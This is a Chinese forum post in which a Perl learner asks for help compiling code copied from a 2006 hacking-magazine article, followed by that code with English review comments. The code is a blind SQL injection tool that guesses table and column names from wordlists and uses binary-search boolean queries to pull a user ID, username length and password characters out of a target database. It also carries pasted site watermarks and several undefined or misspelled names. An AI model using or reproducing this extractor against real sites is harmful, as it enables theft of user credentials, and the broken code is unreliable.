程序调试问题
正在学习perl,在网上看到这篇文章里面的代码,就试着编译了一下,可一直出问题,编译不下去。哪位老大看看能否编译下去?这篇文章发表在黑客防线2006-4-14上面。
http://www.sudu.cn/info/html/edu ... 0050117/177821.html
# Split the global $url into $host, $path and (when present) $port.
# The first pattern is unanchored: an optional "//" (capture 1), a non-greedy
# run up to the next "/" (capture 2, stored as the host) and the remainder
# (capture 3, re-prefixed with "/" to form the path).
# None of these variables is declared with `my`, so they are package globals
# shared with the subs further down the page.
if($url=~/(\/\/)?(.+?)\/(.+)/)
{
$host=$2;
$path='/'.$3;
# A "host:port" value is split again; $port is left untouched otherwise.
if($host=~/(.+):(.+)/)
{
$host=$1;
$port=$2;
}
}
# Send one HTTP request and return the raw response as a list of lines.
# Takes no arguments: the request is assembled from the globals $path, $path1
# and $host, and the socket is opened to $host:$port.
# The sub shares its name with Perl's builtin connect(), so every caller on
# this page uses the `&connect` form to reach it.
# What the server sees is an HTTP/1.0 GET with bare "\n" line endings, a
# Referer equal to the bare host name and an empty Cookie header, repeated
# once per probe with only the tail of the query string changing.
sub connect
{
# NOTE(review): the text after the concatenation dot on the next line looks
# like a watermark of the hosting site picked up when the page was copied; it
# is not Perl. The interpreter error quoted below (byte 0xA1 on this
# statement) is consistent with stray non-ASCII characters in the pasted
# source.
$req = "GET $path$path1 HTTP/1.0\n". DL.bitsCN.com网管软件下载
"Host: $host\n".
"Referer: $host\n".
"Cookie: \n\n";
到这里就调不下去了,editplus调试显示:
---------- perl ----------
Unrecognized character \xA1 at D:\perlcode\sqlinject.pl line 15.
Output completed (0 sec consumed)
我改了下还是不行:
# The poster's second attempt at the same request, built by explicit
# concatenation. As written it emits "Host:" and "Referer:" with no space
# before the value.
$req = "GET ".$path.$path1." HTTP/1.0\n".
"Host:".$host."\n".
"Referer:".$host."\n".
"Cookie: \n\n";
# Open a TCP connection; die with a message if the socket cannot be created.
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $connection $req;
# List-context read: collects every response line until the peer closes.
my @res = <$connection>;
close $connection;
return @res;
}
# Table-name probe. Reads candidate names from table.txt, one per line, and
# for each one sets $path1 to a URL-encoded boolean condition
# ("AND 0<>(select count(*) from <name>)") that connect() appends to the
# request path. The first candidate whose response matches the pattern in
# $info ends the loop.
# $info is not assigned anywhere in the visible code.
# NOTE(review): 2-arg open on a bareword handle; the "www_bitscn_com" token
# after the semicolon looks like copy residue from the hosting site, not Perl.
open (tabInput,"table.txt") or die "can't open file!\n"; www_bitscn_com
# The loop condition is chomp's return value (characters removed), so the
# loop stops when a read yields nothing to strip.
while (chomp(my $input=<tabInput>))
{
my $sql="0<>(select%20count(*)%20from%20$input)";
$path1 = "%20AND%20$sql";
# Calls a sub named url, which is not defined in the visible code.
&url;
@res = &connect;
# The response lines are joined with spaces and matched as one string.
if ("@res"=~/$info/)
{
# The match is stored in $table_user; the print below interpolates $table,
# which the visible code never assigns.
$table_user=$input;
print "the table of userinfo is:$table\n";
last;
}
}
close(tabInput);
# Column-name probe.
# Argument: $_[0] is the path of a word list with one candidate column name
# per line.
# For each candidate, sets the global $path1 to a URL-encoded
# "AND exists (select <name> from $table_User)" condition, sends the request
# through connect(), and stops at the first response matching $info.
# Returns the matching candidate, or undef when none matched.
# Reads the global $table_User, which no visible line assigns.
sub field_input
{
my $field;
# NOTE(review): 2-arg open on a bareword handle, with the file name taken
# directly from the caller.
open (fieInput,"$_[0]") or die "can't open file!\n";
# Loop ends when chomp() removes nothing (see the read in the condition).
while (chomp(my $input=<fieInput>))
{
my $sql="exists%20(select%20$input%20from%20$table_User)";
$path1 = "%20AND%20$sql";
my @res = &connect;
if ("@res"=~/$info/)
{
$field=$input;
print "\t+-- $field --+";
last;
}
}
close(fieInput);
return $field;
}
# Run three column-name probes concurrently, one thread per word-list file;
# join() hands back each thread's return value.
# NOTE(review): the sub name is passed as the string "field_Input", while the
# sub defined on this page is spelled field_input (Perl sub names are
# case-sensitive). No `use threads` line is visible in this excerpt.
$thread1 = threads->create("field_Input","field_Username.txt");
$thread2 = threads->create("field_Input","field_Password.txt");
$thread3 = threads->create("field_Input","field_ID.txt");
$field_Username = $thread1->join();
$field_Password = $thread2->join();
$field_ID = $thread3->join();
# Step tables passed to crack(): descending powers of two. The number of
# entries is the number of requests crack() sends per recovered value.
@dic1=(128,64,32,16,8,4,2,1); # minimum user ID (steps sum to 255)
@dic2=(16,8,4,2,1); # username / password length (steps sum to 31)
@dic3=(64,32,16,8,4,2,1); # English (ASCII) characters (steps sum to 127)
@dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1); # Chinese characters (steps sum to 32767)
# Recover one integer from the server by repeated true/false questions.
# Arguments: a list of step sizes followed by one URL-encoded sub-query; the
# sub-query is popped off the end of the argument list.
# For each step the running guess $crack is moved by +step or -step, the
# global $path1 is set to "AND <guess> < (<sub-query>)", and the request is
# sent through connect(). A response matching $info is treated as "true".
# Returns the final guess.
# Each call therefore produces scalar(@dic) requests to the same path whose
# query strings differ only in the number in front of "<(", which is the
# pattern this loop leaves in the target's access log.
sub crack
{
my(@dic) = @_;
my $sql=pop(@dic);
my $i=0;
# Direction of the next move: +1 adds the step, -1 subtracts it.
my $op=1;
# Starts undefined and is treated as 0 by the first += below.
my $crack;
foreach my $pass(@dic)
{
print ">";
$i++;
$crack+=$op*$pass;
$path1 = "%20AND%20$crack<($sql)";
my @res = &connect;
if ("@res" =~ /$info/)
{
# "True": the guess is below the target, so keep moving up.
$op=1;
# On the last step (count of steps == $i) a "true" answer bumps the guess
# by one more.
if($i==@dic)
{
$crack++;
}
}
else
{
# "False": the next step is subtracted.
$op=-1;
}
}
return $crack;
}
# Drive crack() with three sub-queries: the smallest value in the ID column
# first, then (in two threads) the length of the username and of the password
# for that row. The step list and the sub-query are flattened into one
# argument list, with the sub-query last.
# The len()/min() calls here, and asc()/mid()/abs() further down, are sent as
# literal text in the query string.
$sql="select%20min($field_ID)%20from%20$table_User";
$id=&crack(@dic1,"$sql");
# NOTE(review): this WHERE clause contains the literal text "field_ID" (no
# sigil); the password query two lines below interpolates $field_ID instead.
$sql="select%20len($field_Username)%20from%20$table_User%20where%20field_ID=$id";
my $thread4 = threads->create("crack",@dic2,$sql);
$sql="select%20len($field_Password)%20from%20$table_User%20where%20$field_ID=$id";
my $thread5 = threads->create("crack",@dic2,$sql);
# $userlen is assigned here but not read again in the visible code.
$userlen = $thread4->join();
$passlen = $thread5->join();
# Turn a numeric character code into a byte string.
# Argument: $_[0], the numeric code.
# Codes below 256 are packed directly as one unsigned byte. Any other code is
# negated, formatted as upper-case hex, and reduced by the match below to its
# final hex digit before being packed as hex.
# Returns the packed string.
sub asc
{
    my ($code) = @_;

    # Single-byte range: one unsigned char.
    return pack('C*', $code) if $code < 256;

    my $hex = sprintf("%X", $code * -1);

    # The pattern captures exactly one character at the end of the string, so
    # only the last hex digit is kept.
    $hex = $1 if $hex =~ /(.)$/i;

    return pack("H*", $hex);
}
# Per-character pass over the password column, positions 1..$passlen.
# For each position one request first asks whether asc(mid(...)) is negative
# ("AND 0>(...)"). If the response matches $info, the sub-query is rebuilt
# with abs(...) and searched with the 15-step table @dic4; otherwise the
# original sub-query is searched with the 7-step table @dic3. Each search
# runs crack() in its own thread, so the requests for different positions
# overlap in time.
# NOTE(review): these queries interpolate $field_Id, while the joins earlier
# on the page assign $field_ID; the trailing non-ASCII text on the first $sql
# line looks like copy residue from the hosting site, not Perl.
for (my $locat=1;$locat<=$passlen;$locat++)
{
$sql = "select%20asc(mid($field_Password,$locat,1))%20from%20$table_User%20where%20$field_Id=$id"; 中国_网管联盟
$path1 = "%20AND%200>($sql)";
my @res = &connect;
if ("@res" =~ /$info/)
{
$sql = "select%20abs(asc(mid($field_Password,$locat,1)))%20from%20$table_User%20where%20$field_Id=$id";
$password[$locat] = threads->create("crack",@dic4,$sql);
}
else
{
$password[$locat] = threads->create("crack",@dic3,$sql);
}
}
# Second pass: replace each stored thread object with the value it returned.
# The visible code stops here; the numeric results are not converted or
# printed in this excerpt.
for (my $locat=1;$locat<=$passlen;$locat++)
{
$password[$locat] = $password[$locat]->join();
}